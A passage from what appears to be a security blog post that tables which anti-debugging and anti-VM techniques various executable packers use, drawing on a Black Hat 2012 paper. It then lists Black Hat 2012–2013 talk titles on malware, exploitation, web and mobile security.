   PEB's BeingDebugged (Stealth IsDebuggerPresent)
6. UPXProtectorv10x2
   Nothing

Armadillo

1. Armadillov171
   Instruction Counting
   Instruction Substitution (push – ret)
2. Armadillov1xxv2xx
   Nothing

PECompact

    Anti-VM (STR)

    Anti-VM (SLDT)

    Anti-VM (IN)

    Push Pop Math

    PEB NtGlobalFlag

    PEB's BeingDebugged (Stealth

    IsDebuggerPresent)

    SoftICE – Interrupt 1

    Software Breakpoint Detection

    SS register

BobSoftMiniDelphiBoBBobSoft

    Anti-VM (STR)

    Anti-VM (SLDT)

    Anti-VM (IN)

    Push Pop Math

    PEB's BeingDebugged (Stealth IsDebuggerPresent)

    SoftICE – Interrupt 1

    SS register

ASPack

1. ASPackv212AlexeySolodovnikov
2. ASProtectV2XDLLAlexeySolodo
   Anti-VM (IN)
   PEB's BeingDebugged (Stealth IsDebuggerPresent)
   SS register
3. ASPackv10803AlexeySolodovnikov
   Anti-VM (IN)
   PEB's BeingDebugged (Stealth IsDebuggerPresent)
4. ASPackv21AlexeySolodovnikov
   PEB's BeingDebugged (Stealth IsDebuggerPresent)
   SS register

ProtectSharewareV11eCompservCMS

    Anti-VM (SLDT)

    Anti-VM (IN)

    Instruction Counting

    PEB's BeingDebugged (Stealth IsDebuggerPresent)

    Instruction Substitution (push – ret)

ASProtect13321RegisteredAlexeySolodovni kov ASProtectv12

    Anti-VM (STR)

    Anti-VM (SLDT)

    Anti-VM (IN)

    Push Pop Math

    PEB's BeingDebugged (Stealth IsDebuggerPresent)

    SoftICE – Interrupt 1

    Software Breakpoint Detection

    SS register

WiseInstallerStub

    Nothing

MaskPEV20yzkzero

    Anti-VM (SLDT)

    Anti-VM (IN)

    Push Pop Math

    PEB's BeingDebugged (Stealth IsDebuggerPresent)

    SS register

Reference

[1]  Rodrigo Rubira Branco, Gabriel Negreira Barbosa, Pedro Drimel Neto "Scientific but Not Academical Overview of Malware Anti-Debugging, Anti-Disassembly and Anti-VM Technologies", Black Hat US 2012

Black Hat Conference : Malware

2012 USA : Scientific but Not Academical Overview of Malware Anti-Debugging, Anti-Disassembly and AntiVM Technologies

2012 USA : File Disinfection Framework (FDF) Striking back at polymorphic viruses

2012 USA : FLOWERS FOR AUTOMATED MALWARE ANALYSIS
2012 USA : HYBRID DEFENSE: HOW TO PROTECT YOURSELF FROM POLYMORPHIC 0-DAYS
2013 Europe : OPTISIG: SEMANTIC SIGNATURE FOR METAMORPHIC MALWARE
2012 EuropeThe Kelihos Botnet
2012 EuropeWorkshop: Understanding Botnets By Building One
2012 ABU DHABI :  THE ENDLESS GAME, FIGHTING AGAINST KELIHOS BOTNET
2012 ABU DHABI :  REVERSE AND SIMULATE YOUR ENEMY BOTNET C&C

Black Hat Conference : Other

Web Application
2012 USA : HACKING WITH WEBSOCKETS
2012 USA : HTML5 TOP 10 THREATS – STEALTH ATTACKS AND SILENT EXPLOITS

Reverse Engineering
2012 USA : LESSONS OF BINARY ANALYSIS
2012 USA : LINUX INTERACTIVE EXPLOIT DEVELOPMENT WITH GDB AND PEDA
2012 Europe : Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis

Othera
2012 USA : OWNING BAD GUYS {AND MAFIA} WITH JAVASCRIPT BOTNETS
2012 USA : PRNG: PWNING RANDOM NUMBER GENERATORS (IN PHP APPLICATIONS)
2012 USA : STATE OF WEB EXPLOIT TOOLKITS
2013 Europe : HARNESSING GP2US - BUILDING BETTER BROWSER BASED BOTNETS
2013 Europe : ASSESSING BYOD WITH THE SMARTPHONE PENTEST FRAMEWORK
2012 ABU DHABI :  THE ART OF CYBERWAR
2012 ABU DHABI :  CYBERCRIME KILL CHAIN VS. EFFECTIVENESS OF DEFENSE LAYERS

Black Hat Conference : Exploit

There are some articles about exploit and vulnerability in Black Hat

2012 USA : A Stitch In Time Saves Nine: A Stitch In Time Saves Nine: A Case Of Multiple OS Vulnerability

2012 USA : DIGGING DEEP INTO THE FLASH SANDBOXES

2012 USA : EASY LOCAL WINDOWS KERNEL EXPLOITATION

2012 USA : EXPLOIT MITIGATION IMPROVEMENTS IN WIN 8

2012 USA : RECENT JAVA EXPLOITATION TRENDS AND MALWARE

2012 Europe : Malicious PDF Analysis

2012 Europe : Data Mining a Mountain of Zero Day Vulnerabilities

Black Hat Conference : Modile Device

There are some articles about mobile device in Black Hat

2012 USA : DEX EDUCATION: PRACTICING SAFE DEX
2012 USA : Adventures in BouncerLand
2012 USA : MAPPING AND EVOLUTION OF ANDROID PERMISSIONS
2013 Europe : NEXT GENERATION MOBILE ROOTKITS
2012 Europe : The Heavy Metal That Poisoned the Droid
2012 Europe : The Mobile Exploit Intelligence Projec
2012 ABU DHABI : DROID EXPLOITATION SAGA